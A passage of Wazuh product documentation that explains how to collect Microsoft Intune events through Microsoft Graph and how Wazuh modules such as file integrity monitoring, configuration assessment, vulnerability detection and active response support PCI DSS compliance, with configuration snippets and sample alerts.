The relationships auditEvents, managedDevices, and detectedApps need to be configured within the Wazuh module for Microsoft Graph in the Wazuh agent. This configuration enables Wazuh to search for logs created by Microsoft Graph resources and relationships.

In the example below, we search for auditEvents, managedDevices, and detectedApps type events within the deviceManagement resource at an interval of 5m. The logs will only be those that were created after the module was started.

Perform the following steps on the Wazuh agent:

  1. Edit the Wazuh agent configuration file /var/ossec/etc/ossec.conf and add the following to enable the Wazuh module for Microsoft Graph with the desired relationships:

    <ossec_config>
      <ms-graph>
        <enabled>yes</enabled>
        <only_future_events>yes</only_future_events>
        <curl_max_size>10M</curl_max_size>
        <run_on_start>yes</run_on_start>
        <interval>5m</interval>
        <version>v1.0</version>
        <api_auth>
          <tenant_id><YOUR_TENANT_ID></tenant_id>
          <client_id><YOUR_CLIENT_ID></client_id>
          <secret_value><YOUR_SECRET_VALUE></secret_value>
          <api_type>global</api_type>
        </api_auth>
        <resource>
          <name>deviceManagement</name>
          <relationship>auditEvents</relationship>
          <relationship>managedDevices</relationship>
          <relationship>detectedApps</relationship>
        </resource>
      </ms-graph>
    </ossec_config>
    

    Replace:

    • <YOUR_TENANT_ID> with the tenant ID of the application registered in Azure.

    • <YOUR_CLIENT_ID> with the client ID of the application registered in Azure.

    • <YOUR_SECRET_VALUE> with the secret associated with the application registered in Azure.

  2. Save the file and restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    

For more configuration details, refer to the ms-graph configuration reference documentation.

Note

To avoid duplicate alerts, this setting should be added to only one Wazuh agent.

Extend the Wazuh ruleset

The Wazuh manager includes a basic ruleset to detect events and inventory items collected by the Wazuh agent. To customize detection rules for Microsoft Intune data, extend the Wazuh ruleset by following the ruleset customization documentation. This allows you to tailor the hierarchy and behavior of detection rules to meet specific requirements.

Note

The Wazuh manager includes a set of inbuilt rules that aid in classifying the importance and context of different events.

The official rules associated with Microsoft Intune are:

<group name="ms-graph,">
  <rule id="99651" level="3">
    <if_sid>99500</if_sid>
    <options>no_full_log</options>
    <field name="ms-graph.resource">deviceManagement</field>
    <description>MS Graph message: MDM Intune event.</description>
  </rule>

  <rule id="99652" level="3">
    <if_sid>99651</if_sid>
    <options>no_full_log</options>
    <field name="ms-graph.relationship">auditEvents</field>
    <description>MS Graph message: MDM Intune audit event.</description>
  </rule>

  <rule id="99653" level="3">
    <if_sid>99651</if_sid>
    <options>no_full_log</options>
    <field name="ms-graph.relationship">managedDevices</field>
    <description>MS Graph message: MDM Intune device.</description>
  </rule>

  <rule id="99654" level="3">
    <if_sid>99651</if_sid>
    <options>no_full_log</options>
    <field name="ms-graph.relationship">detectedApps</field>
    <description>MS Graph message: MDM Intune app.</description>
  </rule>
</group>

The image below shows Microsoft Intune alerts generated on the Wazuh dashboard.

Below, we show sample alerts for some of the relationships we configured previously.

Sample alert for detectedApps:

In the example below, Microsoft Intune detects the application Freeform on one of the managed devices. As a result, the JSON below is generated:

{
  "_index": "wazuh-alerts-4.x-2025.01.21",
  "_id": "m3R0iZQBy8z-qvGHPpVH",
  "_score": null,
  "_source": {
    "input": {
      "type": "log"
    },
    "agent": {
      "ip": "X.X.X.X",
      "name": "Windows-10",
      "id": "001"
    },
    "manager": {
      "name": "wazuh-server"
    },
    "data": {
      "ms-graph": {
        "deviceCount": "1",
        "resource": "deviceManagement",
        "displayName": "Freeform",
        "managedDevices": [
          {
            "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxx",
            "deviceName": "xxxxxxxx"
          }
        ],
        "id": "cb7d25a27a1d420817229d272fd27a039b4c330380fc29b2ccc1d3f01e1cfa78",
        "relationship": "detectedApps",
        "version": "2.0",
        "sizeInByte": "0",
        "platform": "macOS"
      },
      "integration": "ms-graph",
      "scan_id": "594315551"
    },
    "rule": {
      "firedtimes": 865,
      "mail": false,
      "level": 3,
      "description": "MS Graph message: MDM Intune app.",
      "groups": [
        "ms-graph"
      ],
      "id": "99654"
    },
    "location": "ms-graph",
    "decoder": {
      "name": "json-msgraph"
    },
    "id": "1737472881.2773328",
    "timestamp": "2025-01-21T15:21:21.941+0000"
  },
  "fields": {
    "timestamp": [
      "2025-01-21T15:21:21.941Z"
    ]
  },
  "sort": [
    1737472881941
  ]
}

Sample alert for managedDevices:

In the example below, Microsoft Intune detects information about a managed device. As a result, the JSON below is generated:

{
  "_index": "wazuh-alerts-4.x-2025.01.21",
  "_id": "ynR3iZQBy8z-qvGHYZae",
  "_score": null,
  "_source": {
    "input": {
      "type": "log"
    },
    "agent": {
      "ip": "X.X.X.X",
      "name": "Windows-10",
      "id": "001"
    },
    "manager": {
      "name": "wazuh-server"
    },
    "data": {
      "ms-graph": {
        "azureADRegistered": "true",
        "deviceRegistrationState": "registered",
        "deviceActionResults": [],
        "easDeviceId": "XXXXXXXXXXXXXXXXXXX",
        "complianceState": "noncompliant",
        "partnerReportedThreatState": "unknown",
        "deviceName": "XXXXXXXXXXXXXXXXXXX",
        "operatingSystem": "Windows",
        "manufacturer": "HP",
        "osVersion": "10.0.22631.4037",
        "lastSyncDateTime": "2024-09-23T18:38:44Z",
        "isEncrypted": "false",
        "exchangeAccessStateReason": "none",
        "totalStorageSpaceInBytes": "478772461568.000000",
        "model": "HP Pavilion Laptop 15-cs0xxx",
        "wiFiMacAddress": "XXXXXXXXXXXXXXXXXXX",
        "id": "XXXXXXXXXXXXXXXXXXX",
        "managedDeviceOwnerType": "company",
        "exchangeLastSuccessfulSyncDateTime": "0001-01-01T00:00:00Z",
        "relationship": "managedDevices",
        "userPrincipalName": "XXXXXXXXXXXXXXXXXXX",
        "easActivationDateTime": "0001-01-01T00:00:00Z",
        "jailBroken": "Unknown",
        "serialNumber": "XXXXXX",
        "resource": "deviceManagement",
        "easActivated": "true",
        "exchangeAccessState": "none",
        "deviceEnrollmentType": "deviceEnrollmentManager",
        "userDisplayName": "Tomás",
        "freeStorageSpaceInBytes": "153643646976.000000",
        "managedDeviceName": "XXXXXXXXXXXXXXXXXXX",
        "userId": "XXXX-XXXX-XXXX-XXXXXXX",
        "managementAgent": "mdm",
        "isSupervised": "false",
        "azureADDeviceId": "XXXX-XXXX-XXXX-XXXXXXX",
        "deviceCategoryDisplayName": "Unknown",
        "physicalMemoryInBytes": "0",
        "managementCertificateExpirationDate": "2025-08-29T20:39:04Z",
        "complianceGracePeriodExpirationDateTime": "2024-10-23T23:52:11Z",
        "enrolledDateTime": "2024-08-30T19:48:53Z"
      },
      "integration": "ms-graph",
      "scan_id": "1365180664"
    },
    "rule": {
      "firedtimes": 6,
      "mail": false,
      "level": 3,
      "description": "MS Graph message: MDM Intune device.",
      "groups": [
        "ms-graph"
      ],
      "id": "99653"
    },
    "location": "ms-graph",
    "decoder": {
      "name": "json-msgraph"
    },
    "id": "1737473086.3097425",
    "timestamp": "2025-01-21T15:24:46.407+0000"
  },
  "fields": {
    "data.ms-graph.exchangeLastSuccessfulSyncDateTime": [
      "0001-01-01T00:00:00.000Z"
    ],
    "timestamp": [
      "2025-01-21T15:24:46.407Z"
    ],
    "data.ms-graph.enrolledDateTime": [
      "2024-08-30T19:48:53.000Z"
    ],
    "data.ms-graph.complianceGracePeriodExpirationDateTime": [
      "2024-10-23T23:52:11.000Z"
    ],
    "data.ms-graph.managementCertificateExpirationDate": [
      "2025-08-29T20:39:04.000Z"
    ],
    "data.ms-graph.lastSyncDateTime": [
      "2024-09-23T18:38:44.000Z"
    ],
    "data.ms-graph.easActivationDateTime": [
      "0001-01-01T00:00:00.000Z"
    ]
  },
  "sort": [
    1737473086407
  ]
}

Import custom dashboards

Import the predefined dashboards to visualize Microsoft Intune alerts in the Wazuh dashboard. These dashboards are not configured out-of-the-box on Wazuh deployments and are provided as separate packages. Perform the following steps to import the Microsoft Intune dashboards:

  1. Download the MS graph Intune events and Intune managed devices and apps dashboards.

  2. Import the downloaded dashboards using the Wazuh dashboard import functionality. Navigate to Dashboard management > Dashboards Management > Saved objects on the Wazuh dashboard. Click Import.

  3. Select one of the downloaded files and click on Import. Repeat this step for the other file.

  4. Access the dashboards from the Saved objects tab. Alternatively, navigate to Explore > Dashboards to view the dashboards.

Dashboard examples

Monitoring GitHub

GitHub is a cloud-based platform that provides version control and collaboration tools for software development projects. It offers an API that enables developers to interact with it programmatically. GitHub provides an audit logging feature that records events as they occur within an organization. Organizations can leverage the audit log to track changes and monitor user activities, therefore enhancing transparency.

This section describes how to monitor GitHub audit logs for your organization. Wazuh can monitor the following GitHub activities:

  • Access to your organization or repository settings.

  • Changes in repository permissions.

  • User addition or removal in an organization, repository, or team.

  • Changes in member privileges.

  • Changes to permissions of a GitHub App.

  • Git events such as cloning, fetching, and pushing.
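
As an illustration, the audit log data that Wazuh collects for an organization can also be retrieved directly from the GitHub REST API. The sketch below is only for verifying access and is not part of the Wazuh configuration; it assumes your plan exposes the organization audit log API, and <GITHUB_TOKEN> and <ORG_NAME> are placeholders for your own token and organization name:

# curl -s -H "Accept: application/vnd.github+json" \
    -H "Authorization: Bearer <GITHUB_TOKEN>" \
    "https://api.github.com/orgs/<ORG_NAME>/audit-log"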

Monitoring Google Cloud

Google Cloud is a comprehensive suite of cloud computing services provided by Google. It offers various infrastructure and application services, enabling businesses to efficiently deploy, build, and scale applications as needed.

Wazuh offers security monitoring, incident response, and regulatory compliance capabilities that enhance the security posture of your Google Cloud infrastructure. You can install Wazuh agents on your Google Cloud instances or configure Wazuh modules to integrate with supported Google Cloud services. This allows you to analyze events and receive real-time alerts for anomalies within your Google Cloud environment.

Monitoring Office 365

Office 365 is a cloud-based service offered by Microsoft that provides access to a suite of productivity and collaboration tools, including applications such as Word, Excel, PowerPoint, Outlook, OneDrive, Teams, and SharePoint. Monitoring Office 365 provides visibility and data visualization for actions occurring across its suite of tools.

Regulatory compliance

Wazuh helps organizations meet regulatory compliance requirements and gain visibility into their compliance posture. This is done by providing automation, improved security controls, log analysis, and incident response.

The default Wazuh ruleset provides support for PCI DSS, HIPAA, NIST 800-53, TSC, and GDPR frameworks and standards. Wazuh rules and decoders are used to detect attacks, system errors, security misconfigurations, and policy violations.

Learn more about achieving compliance with Wazuh in the sections below:

Using Wazuh for PCI DSS compliance

The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary information security standard for organizations that handle credit cards. The standard was created to increase controls around cardholder data to reduce credit card fraud.

Wazuh helps ensure PCI DSS compliance by performing log collection, file integrity checking, configuration assessment, intrusion detection, real-time alerting, and active response. The Wazuh dashboard displays information in real-time, allowing filtering by different types of alert fields, including compliance controls. We have also developed a couple of PCI DSS dashboards for convenient viewing of relevant alerts. The syntax used for tagging PCI DSS relevant rules is pci_dss_ followed by the number of the requirement (e.g., pci_dss_10.2.4 and pci_dss_10.2.5).

This guide explains how Wazuh capabilities and modules assist with meeting PCI DSS version 4.0 requirements. In the following sections, we show some use cases of how to use these capabilities and modules to meet specific requirements:

Log data analysis

In many cases, you can find evidence of an attack in the log messages of devices, systems, and applications. The Wazuh log data analysis module receives logs through text files or Windows event logs. It can also directly receive logs via remote syslog, which is useful for firewalls and other such devices.
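
As a quick illustration of the syslog path, once a syslog listener is configured on the Wazuh server, you can send a test message from any Linux endpoint with the util-linux logger utility. This sketch assumes the server is listening for syslog on UDP port 514, and <WAZUH_SERVER_IP> is a placeholder for your server address:

# logger -n <WAZUH_SERVER_IP> -P 514 -d "Wazuh remote syslog test"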

Additionally, the log data analysis module analyzes the log data received from agents. It performs decoding and rule matching on the received data to process it. You can then use this processed log data for threat detection, prevention, and active response.

The log collector module helps to meet the following PCI DSS requirement:

  • Requirement 10 - Log and Monitor All Access to System Components and Cardholder Data: This control requires that user activities, including those by employees, contractors, consultants, internal and external vendors, and other third parties are logged and monitored, and the log data stored for a specified period of time.

To help meet this requirement, the Wazuh agent collects logs from the endpoints it is deployed on. The log analysis module also receives logs via syslog for network and other syslog-enabled devices. It decodes the logs received to extract relevant information from its fields. After that, it compares the extracted information to the ruleset to look for matches. When the extracted information matches a rule, Wazuh generates an alert. Refer to the ruleset section for more information.

Wazuh also retains logs of events that do not generate an alert. For this, it uses its archives feature and long-term storage in the Wazuh indexer. For more information on configuring log collection, see the Log data collection section.

Use cases
  • PCI DSS 10.2.2 requires that audit logs record the following details for each auditable event:

    • User identification.

    • Type of event.

    • Date and time.

    • Success and failure indication.

    • Origination of event.

    • Identity or name of affected data, system component, resource, or service (for example, name and protocol).

      The following are some Wazuh rules that help achieve this requirement:

    • Rule 5710 - sshd: attempt to login using a non-existent user: This rule generates an alert when a non-existent user tries to log in to a system via SSH. The generated alert contains the information required by requirement 10.2.2 (user identification, type of event, date and time, success and failure indication, origination of event, and identity or name of affected data, system component, resource, or service). The screenshot below shows the alert generated on the dashboard:

    • Rule 5715 - sshd: authentication success: This rule generates an alert when a user successfully logs into a system via SSH. The generated alert contains the information required by requirement 10.2.2 (user identification, type of event, date and time, success and failure indication, origination of event, and identity or name of affected data, system component, resource, or service). The screenshot below shows the alert generated on the dashboard:

  • PCI DSS 10.5.1 requires that you retain audit log history for at least 12 months, with at least the most recent three months immediately available for analysis. You can achieve this by enabling Wazuh log archives and configuring index management policies. To enable Wazuh log archives, take the following steps:

    Enable Wazuh log archives and index the archived events in the Wazuh indexer:

    1. Set <logall_json>yes</logall_json> in /var/ossec/etc/ossec.conf.

    2. Set archives: enabled to true in /etc/filebeat/filebeat.yml:

      archives:
        enabled: true
      
    3. Restart Filebeat:

      # systemctl restart filebeat
      
    4. Restart the Wazuh manager:

      # systemctl restart wazuh-manager
      
    5. Open the menu and select Dashboard management > Dashboards Management in the Wazuh dashboard.

    6. Choose Index Patterns and select Create index pattern. Use wazuh-archives-* as the index pattern name.

    7. Select timestamp as the primary time field for use with the global time filter, then proceed to create the index pattern.

    8. Open the menu and select Discover under Explore. Events should be getting reported there.
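
    You can also confirm on the Wazuh server that archived events are being written to disk. As a quick check, assuming the default installation paths, the archive files are stored under /var/ossec/logs/archives/:

      # tail -n 1 /var/ossec/logs/archives/archives.json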

  • PCI DSS requirement 10.4.1 requires reviewing the following audit logs at least once daily:

    • All security events.

    • Logs of all system components that store, process, or transmit cardholder data (CHD) and/or sensitive authentication data (SAD).

    • Logs of all critical system components.

    • Logs of all servers and system components that perform security functions (for example, network security controls, intrusion-detection systems/intrusion-prevention systems (IDS/IPS), and authentication servers).

    This requirement ensures that logs are analyzed for indicators of compromise at least once daily. The following are some Wazuh rules that may help in achieving this requirement:

    • Rule 61138: New Windows Service Created. The analysis engine analyzes Windows system logs to detect when a new service is created, generating an alert from this rule.

    • Rule 31168: Shellshock attack detected. The analysis engine analyzes logs from a WAF or web application to detect Shellshock attacks, generating an alert.

Configuration assessment

The Security configuration assessment module determines the state of hardening and configuration policies on agents. SCA performs scans to discover exposures or misconfigurations in monitored endpoints. Those scans assess the configuration of the hosts using policy files that contain rules to be tested against the actual configuration of the host.

The SCA module helps to meet the following PCI DSS requirements:

  • Requirement 2 - Apply Secure Configuration to All System Components: This requirement ensures the changing of default passwords, removing unnecessary software, functions, and accounts, and disabling or removing unnecessary services all in order to reduce the potential attack surface.

  • Requirement 8 - Identify Users and Authentication Access to System Components: This requirement ensures that the identification of an individual or process on a computer system is conducted by associating an identity with a person or process through an identifier, such as a user, system, or application ID. These IDs (also referred to as “accounts”) fundamentally establish the identity of an individual or process by assigning unique identification to each person or process to distinguish one user or process from another. When each user or process is uniquely identified, it ensures there is accountability for actions performed by that identity. When such accountability is in place, actions taken are traced to known and authorized users and processes.

To achieve the above requirements, SCA runs assessment checks. These checks assess whether it is necessary to change password-related configuration to ensure strong passwords, remove unnecessary software, disable unnecessary services, or audit the TCP/IP stack configuration. Sources of system hardening standards accepted by the industry include, but are not limited to: the Center for Internet Security (CIS), the International Organization for Standardization (ISO), SysAdmin Audit Network Security (SANS), and the National Institute of Standards and Technology (NIST).

Out of the box, Wazuh includes CIS baselines for a wide range of operating systems and applications, including Debian, macOS, Red Hat, and Windows operating systems. For more information, see the list of available SCA policies. You can also create baselines for other systems or applications. Find more details on configuring SCA checks in the SCA documentation section.
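
As an illustration, assuming a default Linux installation, you can list the SCA policy files bundled with a Wazuh agent to see which baselines are available locally:

# ls /var/ossec/ruleset/sca/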

Use cases

Below are some PCI DSS requirement use cases that can be met with the SCA module.

  • PCI DSS 2.2.4 requires enabling only necessary services, protocols, daemons, and functions to remove or disable all unnecessary functionality. IP forwarding is an example of a system service that may be abused if misconfigured. When IP forwarding is configured on a device, it may serve as a router to be abused.

    In order to perform checks for this specific use case, the SCA module has check 18579 Ensure IP forwarding is disabled for Ubuntu 18.04 endpoints. When an SCA scan runs, you can detect if this use case is satisfied.

    Note that the SCA check IDs for the same requirement may vary depending on the endpoint the SCA scan is being run on.
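
    For illustration only, you can manually inspect the kernel setting that this check evaluates. A minimal sketch, assuming an Ubuntu endpoint, where a value of 0 means IP forwarding is disabled:

    # sysctl net.ipv4.ip_forward
    
    net.ipv4.ip_forward = 0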

  • PCI DSS 8.3.7 states that individuals are not allowed to submit a new password/passphrase that is the same as any of the last four passwords/passphrases used.

    We have the SCA check 18674 Ensure password reuse is limited for Ubuntu 18.04 endpoints. It checks the password reuse policy and helps meet requirement 8.3.7. So, when an SCA scan runs, you can detect if the password history policy meets the requirement.

Malware detection

Wazuh offers several capabilities that support malware detection. These detections are done using components such as the rootcheck module, CDB lists, integrations with VirusTotal and YARA, and the Active Response module.

These malware detection components help meet the following PCI DSS requirement:

  • Requirement 5 - Protect All Systems and Networks from Malicious Software: Malicious software (malware) is software or firmware designed to infiltrate or damage a computer system without the owner's knowledge or consent, with the intent of compromising the confidentiality, integrity, or availability of the owner’s data, applications, or operating system. The goal of this requirement is to protect systems from current and evolving malware threats.

To help meet the above PCI DSS requirement, Wazuh uses a combination of rootcheck, CDB lists, integrations with VirusTotal and YARA, and active response to detect and remove malicious files.

Use cases
  • PCI DSS 5.2.2 requires that the deployed anti-malware solution(s):

    • Detects all known types of malware.

    • Removes, blocks, or contains all known types of malware.

    Detecting a rootkit is a sample case for malware detection. The rootcheck module runs several tests to detect rootkits. One of them checks for files hidden in /dev. The /dev directory should only contain device-specific files such as the primary IDE hard disk (/dev/hda), and the kernel random number generators (/dev/random and /dev/urandom), among others. Any additional files, beyond the expected device-specific files, needs inspection. Many rootkits use /dev as a storage partition to hide files.

    In the following example we have a rootkit on the endpoint that creates hidden files in /lib/udev/rules.d. When the rootcheck scan is run, an alert is generated detecting the hidden files.
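
    For illustration only, a manual equivalent of the hidden-files check is to search /dev for hidden regular files; on a clean system this returns no results. A minimal sketch:

    # find /dev -type f -name ".*"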

File integrity monitoring

File integrity monitoring compares the cryptographic checksum and other attributes of a known file against the checksum and attributes of that file after it has been modified.

First, the Wazuh agent scans the system periodically at a specified interval, then it sends the checksums of the monitored files and registry keys (for Windows systems) to the Wazuh server. The server stores the checksums and looks for modifications by comparing the newly received checksums against the historical checksum values for those files and/or registry keys. An alert is generated if the checksum (or another file attribute) changes. Wazuh also supports near real-time file integrity monitoring.
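
The following is a minimal sketch of this idea, not a representation of how the FIM module is implemented. It records a baseline checksum of the example file used later in this guide, modifies the file, and then re-verifies the checksum:

# sha256sum /root/credit_cards/cardholder_data.txt > /tmp/cardholder_data.sha256
# echo "User2 = card7" >> /root/credit_cards/cardholder_data.txt
# sha256sum -c /tmp/cardholder_data.sha256

/root/credit_cards/cardholder_data.txt: FAILED
sha256sum: WARNING: 1 computed checksum did NOT match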

The file integrity monitoring module is used to meet some sub-requirements of PCI DSS requirement 11 which requires testing the security of systems and networks regularly. This requirement aims to ensure that system components, processes, and bespoke and custom software are tested frequently to ensure security controls continue to reflect a changing environment. Some of the changes in the environment may include the modification and deletion of critical files. This module helps to monitor these file changes and assist in achieving PCI DSS compliance.

Use cases
  • PCI DSS 11.5.2 requires the deployment of a change-detection mechanism (for example, file integrity monitoring tools) to alert personnel of unauthorized modification (including changes, additions, and deletions) of critical system files, configuration files, or content files; and to configure the software to perform critical file comparisons at least weekly.

    In the following sections, we look at configuring Wazuh to do the following:

    • Detect changes in a file

    • Perform critical file comparisons at specified intervals

    • Detect file deletion

Detect changes in a file

For this use case, we configure Wazuh to detect when changes are made to a file in the directory /root/credit_cards and the details of the user that made the changes.

On the agent

  1. First, check whether the Audit daemon is installed on the system.

    On Red Hat-based systems, auditd is commonly installed by default. If it is not installed, install it using the following command:

    # yum install audit
    

    On Debian-based systems, use the following command:

    # apt install auditd
    
  2. Check the full file path for the file or directory to be monitored. In this case, the module monitors the directory /root/credit_cards for changes:

    # ls -l  /root/credit_cards/
    
    total 4
    -rw-r--r--. 1 root root 14 May 16 14:53 cardholder_data.txt
    
    # cat /root/credit_cards/cardholder_data.txt
    
    User1 = card4
    
  3. Add the following configuration to the syscheck block of the agent configuration file (/var/ossec/etc/ossec.conf). This enables real-time monitoring of the directory. It also ensures that Wazuh generates an alert when a file in the directory is modified. This alert has the details of the user who made the changes on the monitored files and the program name or process used to carry them out:

    <syscheck>
       <directories check_all="yes" whodata="yes">/root/credit_cards</directories>
    </syscheck>
    
  4. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  5. Execute the following command to check if the Audit rule for monitoring the selected folder is applied:

    # auditctl -l | grep wazuh_fim
    

    Check in the command output that the rule was added:

    auditctl -w /root/credit_cards -p wa -k wazuh_fim
    
  6. Edit the file and add new content:

    # nano /root/credit_cards/cardholder_data.txt
    

    You can see an alert generated to show that a file in the monitored directory was modified.

    In the alert details, you can see the PCI DSS requirement met, the differences in the file checksum, the file modified, the modification time, the whodata showing the process and user that made the modification, and other details.

Perform critical file comparisons at specified intervals

In this use case, we configure Syscheck to detect when changes have been made to monitored files over specific time intervals and show the differences in the file between the last check and the present check. To illustrate this, in the steps below, we configure syscheck to perform a scan every 1 hour and generate an alert for every file change detected.

Note

  • Syscheck runs scans every 12 hours by default. The scan frequency set is for all monitored files/directories except directories with real-time monitoring enabled.

  • Depending on the number of files/directories configured for scans, and the frequency of syscheck scans, you may observe increased CPU and memory usage. Please use the frequency option carefully.

On the agent

  1. Determine the full file path for the file to be monitored. In this case, we are monitoring the file /root/credit_cards/cardholder_data.txt for changes.

    Note

    Showing the changes made in a file is limited to only text files at this time.

  2. Update the frequency option of the syscheck block in the /var/ossec/etc/ossec.conf agent configuration file. Set a scan interval in seconds. For example, every 3600 seconds:

    <frequency>3600</frequency>
    
  3. Add the following configuration to the syscheck block of the /var/ossec/etc/ossec.conf agent configuration file. This enables monitoring of the file. It also ensures that Wazuh generates an alert with the differences when the file is modified.

    <syscheck>
       <directories check_all="yes" report_changes="yes" >/root/credit_cards/cardholder_data.txt</directories>
    </syscheck>
    

    Note

    If you prefer that the changes are monitored in real-time, you can use the configuration below to monitor the directory where the file is saved and disregard making the frequency modification.

    <syscheck>
       <directories check_all="yes" report_changes="yes" realtime="yes" >/root/credit_cards</directories>
    </syscheck>
    
  4. Restart the Wazuh agent to apply the changes.

    # systemctl restart wazuh-agent
    
  5. Proceed to modify the file. In this case, we removed some content. An alert is generated on the next Syscheck scan about the modified file.

    In the alert details, you can see the changes made in syscheck.diff, the file modified, the PCI DSS requirement met, the differences in the file checksum, the modification time, and other details.

Detect file deletion

In this scenario, Syscheck detects when a file in a monitored directory is deleted. To illustrate this, in the steps below, Syscheck is configured to monitor the /root/credit_cards/ directory for changes.

On the agent

  1. Determine the full file path for the file or directory to be monitored. In this case, we are monitoring the directory /root/credit_cards.

  2. Add the following configuration to the syscheck block of the /var/ossec/etc/ossec.conf agent configuration file. This enables real-time monitoring of the directory. It also ensures that Wazuh generates an alert when a file in the directory is deleted.

    <syscheck>
       <directories check_all="yes" realtime="yes" >/root/credit_cards</directories>
    </syscheck>
    
  3. Restart the Wazuh agent to apply the changes.

    # systemctl restart wazuh-agent
    
  4. Delete a file from the directory. For example, cardholder_data.txt. You can see an alert generated for the file deleted.

    In the alert details, you can see the file deleted, the PCI DSS requirement met, the deletion time, and other details.

    You can track these activities from the PCI DSS module dashboard. The dashboard shows all activities that trigger a PCI DSS requirement including FIM changes.

Vulnerability detection

Wazuh is able to detect vulnerabilities in the applications installed on agents using the Vulnerability Detection module. This software audit is performed by querying our Cyber Threat Intelligence (CTI) API for vulnerability content documents. We aggregate vulnerability information into the CTI repository from external vulnerability sources indexed by Canonical, Debian, Red Hat, Arch Linux, Amazon Linux Advisories Security (ALAS), Microsoft, CISA, and the National Vulnerability Database (NVD). We also maintain the integrity of our vulnerability data and keep the vulnerabilities repository updated, ensuring the solution checks for the latest CVEs. The Vulnerability Detection module correlates this information with data from the endpoint application inventory.

The vulnerability detection module helps to meet the following PCI DSS requirements:

  • Requirement 6 - Develop and Maintain Secure Systems and Software: Actors with bad intentions can use security vulnerabilities to gain privileged access to systems. Many of these vulnerabilities are fixed by vendor-provided security patches, which must be installed by the entities that manage the systems. All system components must have all appropriate software patches to protect against the exploitation and compromise of account data by malicious individuals and malicious software.

The goal of this requirement is to ensure that systems and software have the appropriate security patches for discovered vulnerabilities to prevent compromise.

  • Requirement 11 - Test Security of Systems and Networks Regularly: Vulnerabilities are being discovered continually by malicious individuals and researchers, and being introduced by new software. System components, processes, and bespoke and custom software should be tested frequently to ensure security controls continue to reflect a changing environment.

The goal of this requirement is to ensure that systems and networks are regularly tested to confirm their security status. These tests include penetration testing and vulnerability scans.

The Wazuh vulnerability detection module helps to meet the above requirements. The Wazuh agent collects a list of installed applications and OS information and sends it periodically to the manager. The Wazuh manager compares this information with vulnerability content documents to determine what vulnerabilities exist on an endpoint. You can find more details on configuring vulnerability detection in the vulnerability detection section of the documentation.

Use cases

Below are some PCI DSS requirement use cases that can be met with the Vulnerability Detection module:

  • PCI DSS 6.3 requires identifying and addressing security vulnerabilities. While vulnerability detection is enabled by default, you can still check that everything is properly configured. For example, you can add the following block to the shared agent configuration file /var/ossec/etc/shared/default/agent.conf to make sure vulnerabilities are detected in packages installed on Ubuntu 20.04 endpoints.

    <wodle name="syscollector">
       <disabled>no</disabled>
       <interval>1h</interval>
       <packages>yes</packages>
    </wodle>
    

    Make sure vulnerability detection is enabled by checking the /var/ossec/etc/ossec.conf manager configuration file.

    <vulnerability-detection>
      <enabled>yes</enabled>
      <index-status>yes</index-status>
      <feed-update-interval>60m</feed-update-interval>
    </vulnerability-detection>
    
    <indexer>
      <enabled>yes</enabled>
      <hosts>
        <host>https://0.0.0.0:9200</host>
      </hosts>
      <ssl>
        <certificate_authorities>
          <ca>/etc/filebeat/certs/root-ca.pem</ca>
        </certificate_authorities>
        <certificate>/etc/filebeat/certs/filebeat.pem</certificate>
        <key>/etc/filebeat/certs/filebeat-key.pem</key>
      </ssl>
    </indexer>
    

    If you made changes, restart the manager to apply them.

    # systemctl restart wazuh-manager
    

    You can see the results on the Wazuh dashboard. They include details of vulnerable packages, for example, vulnerabilities in the vim application. When you select a specific vulnerability detected, the Wazuh dashboard shows an overview of the issue and its status on the agent.

  • PCI DSS 11.3 requires identifying, prioritizing, and addressing external and internal vulnerabilities regularly. The Wazuh Vulnerability Detection module gives details on the severity rating and the CVSS scores, which helps prioritize the vulnerabilities. From the vulnerability detection dashboard, you can filter by vulnerability severity rating to prioritize remediation.

Active Response

Active Response allows the execution of scripts whenever an event matches certain rules in your Wazuh ruleset. The actions executed could be a firewall block or drop, traffic shaping or throttling, or account lockout, among others.

The Active Response module helps to meet the following PCI DSS requirement:

  • Requirement 11 - Test Security of Systems and Networks Regularly: Vulnerabilities are being discovered continually by malicious individuals and researchers, and being introduced by new software. System components, processes, and bespoke and custom software should be tested frequently to ensure security controls continue to reflect a changing environment.

This requirement aims to ensure that you test your systems and networks regularly. Testing allows you to assess your security status and to detect and respond to possible intrusions. With the Active Response module, you can respond to intrusions and unauthorized file changes. You can find more details on configuring the Active Response module in the Active Response documentation section.

Use cases
  • PCI DSS 11.5 requires that you detect and respond to network intrusions and unexpected file changes. You can configure scripts to run when specific events occur, allowing you to respond to these intrusions. Wazuh comes with preconfigured active response scripts. Refer to the Default Active response scripts section to access these scripts.

    Using the steps below, we configure the Active Response module to execute an IP block when an attempt to log in with a non-existent user via SSH occurs.

    1. Configure Active Response to execute the firewall-drop command when the rule for attempts to log in with a non-existent user (rule 5710) is triggered. Add the following block to the manager configuration file (/var/ossec/etc/ossec.conf):

      <active-response>
         <disabled>no</disabled>
         <command>firewall-drop</command>
         <location>local</location>
         <rules_id>5710</rules_id>
         <timeout>100</timeout>
      </active-response>
      

      Note

      The firewall-drop command is included in the manager configuration file by default.

    2. Restart the Wazuh manager to apply the configuration:

      # systemctl restart wazuh-manager
      

      When we attempt to SSH with a non-existent user, rule 5710 generates an alert followed by the active response getting triggered.
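
      For example, from another machine you can try to log in over SSH with a made-up username. Both the username and the agent IP address below are placeholders:

      $ ssh nonexistentuser@<AGENT_IP>
      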

System inventory

Wazuh uses the Syscollector module to gather information about a monitored endpoint. This information includes hardware details, OS information, network details, services, browser extensions, running processes, users, and groups. The agent runs periodic scans on the endpoint and sends the information to the manager. The manager then updates the appropriate system information. See the System inventory section for more information about the Wazuh Syscollector module.

The Wazuh Syscollector module helps to meet the following PCI DSS requirement:

  • Requirement 2 - Apply Secure Configuration to All System Components: Malicious individuals, both external and internal to an entity, often use default passwords and other vendor default settings to compromise systems. These passwords and settings are well known and are easily determined via public information. Applying secure configurations to system components reduces the means available to an attacker to compromise the system. Changing default passwords, removing unnecessary software, functions, and accounts, and disabling or removing unnecessary services all help to reduce the potential attack surface.

The Wazuh Syscollector module helps to achieve some of the objectives of this requirement. It keeps an inventory of all endpoints and the processes/daemons running on them. The Wazuh Syscollector module also gets information about the endpoint hardware, OS, network details, services, browser extensions, users, and groups. This gives individuals in an organization visibility into PCI DSS relevant assets, enabled network ports, and running processes/daemons.

Use cases

